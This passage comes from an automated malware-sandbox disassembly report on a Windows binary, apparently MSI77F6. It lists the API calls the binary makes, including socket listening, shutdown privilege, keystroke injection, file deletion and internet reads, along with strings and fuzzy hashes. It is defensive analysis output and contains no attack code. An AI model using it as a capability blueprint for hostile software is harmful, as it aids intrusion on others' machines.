                                        • SetCurrentDirectoryW.KERNEL32(00823A68), ref: 007C22B0
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007C22BA
                                        • FindClose.KERNEL32(00000000), ref: 007C22C7
                                        • FindClose.KERNEL32(00000000), ref: 007C22D7
                                        Strings
                                        Similarity
                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 1824444939-438819550
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _memmove_memset
                                        • String ID: Q\E$[$\$\$\$]$^
                                        • API String ID: 3555123492-286096704
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DED0C
                                        • GetFocus.USER32 ref: 007DED1C
                                        • GetDlgCtrlID.USER32(00000000), ref: 007DED27
                                        • _memset.LIBCMT ref: 007DEE52
                                        • GetMenuItemInfoW.USER32 ref: 007DEE7D
                                        • GetMenuItemCount.USER32(00000000), ref: 007DEE9D
                                        • GetMenuItemID.USER32(?,00000000), ref: 007DEEB0
                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 007DEEE4
                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 007DEF2C
                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DEF64
                                        • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 007DEF99
                                        Strings
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                        • String ID: 0
                                        • API String ID: 3616455698-4108050209
                                        APIs
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
                                          • Part of subcall function 007AB8E7: GetLastError.KERNEL32(?,007AB3CB,?,?,?), ref: 007AB90D
                                          • Part of subcall function 007AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,007AB3CB,?,?,?), ref: 007AB91C
                                          • Part of subcall function 007AB8E7: RtlAllocateHeap.NTDLL(00000000,?,007AB3CB), ref: 007AB923
                                          • Part of subcall function 007AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007AB93A
                                          • Part of subcall function 007AB982: GetProcessHeap.KERNEL32(00000008,007AB3E1,00000000,00000000,?,007AB3E1,?), ref: 007AB98E
                                          • Part of subcall function 007AB982: RtlAllocateHeap.NTDLL(00000000,?,007AB3E1), ref: 007AB995
                                          • Part of subcall function 007AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007AB3E1,?), ref: 007AB9A6
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007AB3FC
                                        • _memset.LIBCMT ref: 007AB411
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007AB430
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB441
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 007AB47E
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007AB49A
                                        • GetLengthSid.ADVAPI32(?), ref: 007AB4B7
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007AB4C6
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007AB4CD
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007AB4EE
                                        • CopySid.ADVAPI32(00000000), ref: 007AB4F5
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007AB526
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007AB54C
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007AB560
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        APIs
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                          • Part of subcall function 007B7C0C: GetFileAttributesW.KERNEL32(?,007B6A7B), ref: 007B7C0D
                                        • _wcscat.LIBCMT ref: 007B6E7E
                                        • __wsplitpath.LIBCMT ref: 007B6E99
                                        • FindFirstFileW.KERNEL32(?,?), ref: 007B6EAE
                                        • _wcscpy.LIBCMT ref: 007B6EDD
                                        • _wcscat.LIBCMT ref: 007B6EEF
                                        • _wcscat.LIBCMT ref: 007B6F01
                                        • DeleteFileW.KERNEL32(?), ref: 007B6F0E
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B6F22
                                        • FindClose.KERNEL32(00000000), ref: 007B6F3D
                                        Strings
                                        Similarity
                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                        • String ID: \*.*
                                        • API String ID: 2643075503-1173974218
                                        APIs
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007C24F6
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007C2526
                                        • _wcscmp.LIBCMT ref: 007C253A
                                        • _wcscmp.LIBCMT ref: 007C2555
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007C25F3
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007C2609
                                        Strings
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                        • String ID: *.*
                                        • API String ID: 713712311-438819550
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        APIs
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                          • Part of subcall function 0078B736: GetCursorPos.USER32(000000FF), ref: 0078B749
                                          • Part of subcall function 0078B736: ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                          • Part of subcall function 0078B736: GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        • ReleaseCapture.USER32 ref: 007DEB1A
                                        • SetWindowTextW.USER32(?,00000000), ref: 007DEBC2
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007DEBD5
                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007DECAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 973565025-2107944366
                                        • Opcode ID: 721b838bb0c4ffd170238fbe90f22a9c9b9d3eb0468e860fd8122b0a14fa6fbe
                                        • Instruction ID: 63e4836750ae192cf549bfd27087228d1a59040dfe08ed706541e7a5beff37ab
                                        • Opcode Fuzzy Hash: 721b838bb0c4ffd170238fbe90f22a9c9b9d3eb0468e860fd8122b0a14fa6fbe
                                        • Instruction Fuzzy Hash: AD517A71204304EFDB10EF24CC5AF6A7BF5FB88740F008929F5959A2A2DB789914CB62
                                        APIs
                                          • Part of subcall function 007ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007ABF0F
                                          • Part of subcall function 007ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007ABF3C
                                          • Part of subcall function 007ABEC3: GetLastError.KERNEL32 ref: 007ABF49
                                        • ExitWindowsEx.USER32(?,00000000), ref: 007B830C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-194228
                                        • Opcode ID: af6144d64c6f6dd82e51075a51301e6b48ecc32333e456b7888a2bd17edfa999
                                        • Instruction ID: 8bdf6b2771e6838b1a25582b8d348888ba68f019f2744c7213ee9f6143e8d4bb
                                        • Opcode Fuzzy Hash: af6144d64c6f6dd82e51075a51301e6b48ecc32333e456b7888a2bd17edfa999
                                        • Instruction Fuzzy Hash: 8A018471644211AAE7E826688C5ABFF729CEB01B80F180524F953D71D2DE6C9C00C1A5
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007C9235
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9244
                                        • bind.WS2_32(00000000,?,00000010), ref: 007C9260
                                        • listen.WS2_32(00000000,00000005), ref: 007C926F
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9289
                                        • closesocket.WS2_32(00000000), ref: 007C929D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                        • String ID:
                                        • API String ID: 1279440585-0
                                        • Opcode ID: 41263ab96f90ee4fcad97464899ff883381bbea476f206ecd9fe61cefe1b5837
                                        • Instruction ID: 91356ba69e9ad65148c3750370fdb4121012f4e263bbcbd367030b9bbd626fa1
                                        • Opcode Fuzzy Hash: 41263ab96f90ee4fcad97464899ff883381bbea476f206ecd9fe61cefe1b5837
                                        • Instruction Fuzzy Hash: 98217135600600EFCB60EF64C849F6EB7A9BF48724F10815DE956AB291CB78AD41CB61
                                        APIs
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • _memmove.LIBCMT ref: 007E3020
                                        • _memmove.LIBCMT ref: 007E3135
                                        • _memmove.LIBCMT ref: 007E31DC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID:
                                        • API String ID: 1300846289-0
                                        • Opcode ID: 396255d7703f188cb8f5c12744b5382ea73bc21b67d5c2654126586a42556b45
                                        • Instruction ID: acec438f768b93eecb252ab6aebf3d5e29c4a472c2beef7b25aeb0a2f0f4d172
                                        • Opcode Fuzzy Hash: 396255d7703f188cb8f5c12744b5382ea73bc21b67d5c2654126586a42556b45
                                        • Instruction Fuzzy Hash: 3302A170A01209EFDF04DF65D985AAE77B5FF88340F14C069E80ADB256EB39DA11CB91
                                        APIs
                                          • Part of subcall function 007CACD3: inet_addr.WS2_32(00000000), ref: 007CACF5
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 007C973D
                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 007C9760
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLastinet_addrsocket
                                        • String ID:
                                        • API String ID: 4170576061-0
                                        • Opcode ID: ec8932baa5e0dfe330735c10012e1272436ba046928ddb62be07928190babd75
                                        • Instruction ID: a6c1657f12e456ae184760bd0453f5a47b4f8163d482d7cfe311b177e5c72fa4
                                        • Opcode Fuzzy Hash: ec8932baa5e0dfe330735c10012e1272436ba046928ddb62be07928190babd75
                                        • Instruction Fuzzy Hash: 2541A170640200AFDB10BF24CC8AE7E77EDEF44764F54805CF95AAB392DA789E018B91
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 007BF37A
                                        • _wcscmp.LIBCMT ref: 007BF3AA
                                        • _wcscmp.LIBCMT ref: 007BF3BF
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007BF3D0
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007BF3FE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                        • String ID:
                                        • API String ID: 2387731787-0
                                        • Opcode ID: bbbe6b25cfab4fcc72e3485ca2a9b52e3d49ddcd25282c862d825737e7e3cf06
                                        • Instruction ID: 1dcc79048a8cbfcd5cf1dc208fe1d7ab193f4c91116632234a20df5164db608e
                                        • Opcode Fuzzy Hash: bbbe6b25cfab4fcc72e3485ca2a9b52e3d49ddcd25282c862d825737e7e3cf06
                                        • Instruction Fuzzy Hash: 8B41AF35600301DFCB04DF28C894A9AB3E4FF49324F10456DE95ACB3A1DB39A941CB91
                                        APIs
                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B439C
                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B43B8
                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007B4425
                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007B4483
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 2e5fe0a0d76ca32fac102a75936f0da81cd5d7edd9bc330c3da914d7300374ae
                                        • Instruction ID: 821c5b2ed566c4510edef274f6e559f08272f26a94d451eed070d2515a5857b7
                                        • Opcode Fuzzy Hash: 2e5fe0a0d76ca32fac102a75936f0da81cd5d7edd9bc330c3da914d7300374ae
                                        • Instruction Fuzzy Hash: 014118B0A04288EAEF308B65D8087FD7BB5AF45311F04415AF591A32C2C77C8DA5D775
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • GetCursorPos.USER32(?), ref: 007DEFE2
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007EF3C3,?,?,?,?,?), ref: 007DEFF7
                                        • GetCursorPos.USER32(?), ref: 007DF041
                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,007EF3C3,?,?,?), ref: 007DF077
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                        • String ID:
                                        • API String ID: 1423138444-0
                                        • Opcode ID: 1535d1a3fc0f0d42be44758355a30bdf106a0477129a1e82408d3e1538ad87bd
                                        • Instruction ID: a574f06901d77b4ea91be70d7439dd440939bf7575e63fae2f47e135740935a3
                                        • Opcode Fuzzy Hash: 1535d1a3fc0f0d42be44758355a30bdf106a0477129a1e82408d3e1538ad87bd
                                        • Instruction Fuzzy Hash: 3921A635600118EFCF259F54C898EFA7BB9FB49754F04406AF506873A2C7399D51DB90
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007B221E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: b7f557314a64037773d64cde4d894b77779fab810188c74457ad8a26710df00c
                                        • Instruction ID: 77934086025dcf784136a6beccf725a277fcaa7c6fa259cb66cb91c4756118eb
                                        • Opcode Fuzzy Hash: b7f557314a64037773d64cde4d894b77779fab810188c74457ad8a26710df00c
                                        • Instruction Fuzzy Hash: 00322675A01605DFC728CF69C480AAAB7F0FF48320B15C46EE59ADB7A2D774E942CB44
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0078AE5E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: cc1d19e7b7ccc4895ef5d32a76e018777d5eb086101dbf71ed2e3a7018cd8c9b
                                        • Instruction ID: 5754c4efbdbaf0e1913c0282222b7aa91cdc3fe20bd8dc1f36dbd4221fda3e52
                                        • Opcode Fuzzy Hash: cc1d19e7b7ccc4895ef5d32a76e018777d5eb086101dbf71ed2e3a7018cd8c9b
                                        • Instruction Fuzzy Hash: 0BA10760145285FAFB28BB2A4C8ED7F396DEB8A741B14492BF502D65A1CA2D9C01D373
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007C4A1E,00000000), ref: 007C55FD
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007C5629
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        • API String ID: 599397726-0
                                        • Opcode ID: 27b883b3e415e62abc49d3d9577926a3be3773ac8cd2f63a4efdef57070213da
                                        • Instruction ID: 2c41411dff8497b8b6934ded45fbe734584f9672834e6a5f8759a93547cd603d
                                        • Opcode Fuzzy Hash: 27b883b3e415e62abc49d3d9577926a3be3773ac8cd2f63a4efdef57070213da
                                        • Instruction Fuzzy Hash: 0C41E671500A09FFEB109A90EC85FBFB7BEEB40714F50405EF605A6140DA7ABE819B64
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BEA95
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BEAEF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BEB3C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 11f78a78c2663e3ff915801bf3993016a74409ccd160f396d351d26aed088133
                                        • Instruction ID: fa34fe4a307d5037b34c9db618253407691e023d24984dcbd81c9b0c2b8f7c62
                                        • Opcode Fuzzy Hash: 11f78a78c2663e3ff915801bf3993016a74409ccd160f396d351d26aed088133
                                        • Instruction Fuzzy Hash: 6F213D75A00218EFCB00EFA5D895EEEBBB9FF48310F1580A9E905AB351DB35D915CB50
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B704C
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007B708D
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B7098
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
